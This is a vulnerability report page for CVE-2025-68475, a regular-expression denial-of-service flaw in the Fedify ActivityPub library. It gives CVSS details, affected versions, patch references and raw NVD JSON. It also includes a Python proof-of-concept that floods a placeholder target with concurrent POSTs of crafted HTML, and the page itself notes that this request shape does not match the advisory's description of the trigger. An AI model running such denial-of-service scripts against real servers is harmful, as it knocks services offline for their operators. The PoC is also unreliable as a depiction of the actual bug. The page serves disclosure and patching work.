Security Vulnerability Report
CVE-2025-68475 CVSS 7.5 HIGH

Published: 2025-12-22 22:16:09
Last Modified: 2026-03-17 19:39:32

Description

Fedify is a TypeScript library for building federated server apps powered by ActivityPub. Prior to versions 1.6.13, 1.7.14, 1.8.15, and 1.9.2, a Regular Expression Denial of Service (ReDoS) vulnerability exists in Fedify's document loader. The HTML parsing regex at packages/fedify/src/runtime/docloader.ts:259 contains nested quantifiers that cause catastrophic backtracking when processing maliciously crafted HTML responses. This issue has been patched in versions 1.6.13, 1.7.14, 1.8.15, and 1.9.2.

CVSS Details

CVSS Score: 7.5
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:fedify:fedify:*:*:*:*:*:*:*:* (Fedify < 1.6.13) - VULNERABLE
cpe:2.3:a:fedify:fedify:*:*:*:*:*:*:*:* (Fedify >= 1.7.0, < 1.7.14) - VULNERABLE
cpe:2.3:a:fedify:fedify:*:*:*:*:*:*:*:* (Fedify >= 1.8.1, < 1.8.15) - VULNERABLE
cpe:2.3:a:fedify:fedify:*:*:*:*:*:*:*:* (Fedify >= 1.9.0, < 1.9.2) - VULNERABLE

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
Note that this script posts HTML to a placeholder TARGET_URL. The description above places the vulnerable regex in Fedify's document loader, which runs on HTML responses that Fedify itself fetches from remote servers, so the request shape used here is the script author's own model of the trigger rather than the one the advisory describes; the payload generator is the part that illustrates the nested-quantifier input.

```python
#!/usr/bin/env python3
"""
CVE-2025-68475 PoC - Fedify ReDoS Vulnerability

This PoC demonstrates the Regular Expression Denial of Service
in Fedify's document loader.
"""
import requests
import time
import threading

TARGET_URL = "http://target-server/fedify-endpoint"


def create_malicious_html():
    """
    Generate malicious HTML that triggers catastrophic backtracking
    in Fedify's HTML parsing regex with nested quantifiers.
    """
    # Pattern designed to trigger ReDoS with nested quantifiers
    # Similar to the vulnerable regex pattern in docloader.ts:259
    malicious_pattern = '<div[^>]*>.*?' * 20 + '<' + 'a' * 50 + '>'
    html_payload = f"""
    <!DOCTYPE html>
    <html>
    <head><title>Malicious Page</title></head>
    <body>
    {malicious_pattern}
    <a href="http://legitimate-site.com">Normal Link</a>
    </body>
    </html>
    """
    return html_payload


def send_request(delay=60):
    """
    Send a request with malicious HTML content to trigger ReDoS.
    """
    payload = create_malicious_html()
    try:
        print(f"[+] Sending malicious request to {TARGET_URL}")
        start_time = time.time()
        # Simulating the request that Fedify processes
        response = requests.post(
            TARGET_URL,
            data={'html_content': payload},
            timeout=delay,
            headers={'Content-Type': 'application/x-www-form-urlencoded'}
        )
        elapsed = time.time() - start_time
        print(f"[-] Request completed in {elapsed:.2f} seconds")
    except requests.Timeout:
        print("[!] Request timed out - ReDoS triggered successfully!")
    except Exception as e:
        print(f"[!] Error: {e}")


def main():
    print("=" * 60)
    print("CVE-2025-68475 - Fedify ReDoS PoC")
    print("=" * 60)
    print(f"\nTarget: {TARGET_URL}")
    print("\nStarting attack simulation...")
    # Launch multiple concurrent requests to exhaust resources
    threads = []
    for i in range(10):
        t = threading.Thread(target=send_request, args=(60,))
        threads.append(t)
        t.start()
        time.sleep(0.1)
    print("\n[*] All requests sent. Monitoring for DoS condition...")
    for t in threads:
        t.join()
    print("\n[+] Attack simulation complete")


if __name__ == "__main__":
    main()
```

References

https://github.com/fedify-dev/fedify/commit/2bdcb24d7d6d5886e0214ed504b63a6dc5488779 (Patch)
https://github.com/fedify-dev/fedify/commit/bf2f0783634efed2663d1b187dc55461ee1f987a (Patch)
https://github.com/fedify-dev/fedify/releases/tag/1.6.13 (Product, Release Notes)
https://github.com/fedify-dev/fedify/releases/tag/1.7.14 (Product, Release Notes)
https://github.com/fedify-dev/fedify/releases/tag/1.8.15 (Product, Release Notes)
https://github.com/fedify-dev/fedify/releases/tag/1.9.2 (Product, Release Notes)
https://github.com/fedify-dev/fedify/security/advisories/GHSA-rchf-xwx2-hm93 (Exploit, Mitigation, Vendor Advisory)

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-68475",
    "sourceIdentifier": "[email protected]",
    "published": "2025-12-22T22:16:09.143",
    "lastModified": "2026-03-17T19:39:32.477",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Fedify is a TypeScript library for building federated server apps powered by ActivityPub. Prior to versions 1.6.13, 1.7.14, 1.8.15, and 1.9.2, a Regular Expression Denial of Service (ReDoS) vulnerability exists in Fedify's document loader. The HTML parsing regex at packages/fedify/src/runtime/docloader.ts:259 contains nested quantifiers that cause catastrophic backtracking when processing maliciously crafted HTML responses. This issue has been patched in versions 1.6.13, 1.7.14, 1.8.15, and 1.9.2."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 3.6
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [{"lang": "en", "value": "CWE-1333"}]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {"vulnerable": true, "criteria": "cpe:2.3:a:fedify:fedify:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.6.13", "matchCriteriaId": "8F097114-F157-4FE4-9CB8-2BAA384C5B30"},
              {"vulnerable": true, "criteria": "cpe:2.3:a:fedify:fedify:*:*:*:*:*:*:*:*", "versionStartIncluding": "1.7.0", "versionEndExcluding": "1.7.14", "matchCriteriaId": "A9267FB8-A2C3-4269-A895-703ACA0C7078"},
              {"vulnerable": true, "criteria": "cpe:2.3:a:fedify:fedify:*:*:*:*:*:*:*:*", "versionStartIncluding": "1.8.1", "versionEndExcluding": "1.8.15", "matchCriteriaId": "D9EE0DA7-B892-4C34-B4F6-9B413A1A896F"},
              {"vulnerable": true, "criteria": "cpe:2.3:a:fedify:fedify:*:*:*:*:*:*:*:*", "versionStartIncluding": "1.9.0", "versionEndExcluding": "1.9.2", "matchCriteriaId": "CEFCAFFE-AFCB-468E-8F32-63B8205A39DA"}
            ]
          }
        ]
      }
    ],
    "references": [
      {"url": "https://github.com/fedify-dev/fedify/commit/2bdcb24d7d6d5886e0214ed504b63a6dc5488779", "source": "[email protected]", "tags": ["Patch"]},
      {"url": "https://github.com/fedify-dev/fedify/commit/bf2f0783634efed2663d1b187dc55461ee1f987a", "source": "[email protected]", "tags": ["Patch"]},
      {"url": "https://github.com/fedify-dev/fedify/releases/tag/1.6.13", "source": "[email protected]", "tags": ["Product", "Release Notes"]},
      {"url": "https://github.com/fedify-dev/fedify/releases/tag/1.7.14", "source": "[email protected]", "tags": ["Product", "Release Notes"]},
      {"url": "https://github.com/fedify-dev/fedify/releases/tag/1.8.15", "source": "[email protected]", "tags": ["Product", "Release Notes"]},
      {"url": "https://github.com/fedify-dev/fedify/releases/tag/1.9.2", "source": "[email protected]", "tags": ["Product", "Release Notes"]},
      {"url": "https://github.com/fedify-dev/fedify/security/advisories/GHSA-rchf-xwx2-hm93", "source": "[email protected]", "tags": ["Exploit", "Mitigation", "Vendor Advisory"]}
    ]
  }
}
```